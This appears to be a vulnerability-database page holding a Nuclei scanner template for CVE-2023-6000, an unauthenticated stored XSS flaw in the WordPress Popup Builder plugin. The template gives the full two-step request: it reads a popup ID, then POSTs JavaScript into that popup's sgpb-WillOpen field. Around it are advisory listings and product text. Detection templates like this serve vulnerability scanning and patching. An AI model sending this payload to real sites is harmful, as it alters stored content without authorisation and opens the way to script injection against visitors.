Lucene search
+L

WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS

🗓️ 27 Oct 2026 02:09:31Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

WordPress Popup Builder before 4.2.3 allows unauthenticated popup updates with JavaScript injection, enabling cross site scripting.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Sygnoos Popup_Builder
10 Mar 202416:20
–githubexploit
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Sygnoos Popup_Builder
14 Oct 202414:11
–githubexploit
bdu_fstec
BDU FSTEC
Popup Builder Plugin XSS
20 Mar 202400:00
–bdu_fstec
circl
Circl
CVE-2023-6000
1 Jan 202416:26
–circl
cnnvd
CNNVD
WordPress Plugin Popup Builder Security Vulnerability
1 Jan 202400:00
–cnnvd
cve
CVE
CVE-2023-6000
1 Jan 202414:18
–cve
cvelist
Cvelist
CVE-2023-6000 Popup Builder < 4.2.3 - Unauthenticated Stored XSS
1 Jan 202414:18
–cvelist
euvd
EUVD
EUVD-2023-58267
1 Jan 202414:18
–euvd
kitploit
Kitploit
CVE-2023-6000-POC
27 Oct 202611:55
–kitploit
kitploit
Kitploit
CVE-2023-6000
28 Oct 202611:57
–kitploit
Rows per page
id: CVE-2023-6000

info:
  name: WordPress Popup Builder <= 4.2.3 - Unauthenticated Stored XSS
  author: riteshs4hu
  severity: medium
  description: |
    The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
  impact: |
    Unauthenticated attackers can update existing popups and inject raw JavaScript to achieve stored cross-site scripting attacks against WordPress Popup Builder users.
  remediation: Fixed in 4.2.3
  reference:
    - https://wordpress.org/plugins/popup-builder/
    - https://nvd.nist.gov/vuln/detail/cve-2023-6000
    - https://wpscan.com/vulnerability/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8/
    - https://github.com/rxerium/CVE-2023-6000
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6000
    cwe-id: CWE-79
    epss-score: 0.01999
    epss-percentile: 0.80612
    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sygnoos
    product: popup_builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/popup-builder"
    publicwww-query: "/wp-content/plugins/popup-builder/"
  tags: cve,cve2023,wordpress,wp-plugin,wp,wpscan,xss,stored,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: popup_id
        group: 1
        regex:
          - 'sgpb-main-popup-data-container-([0-9]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'alert(\'document.domain\')', 'popup-builder')
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 490a00463044022005a3ea0dcbc4be17db1d59f38499916eeffee650679de305db37accb5912632d022019a9ae6cb0414160ec6ef4ea31ee40aa8a98048184f0072141452a48509d1db0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1
EPSS0.01999
SSVC
37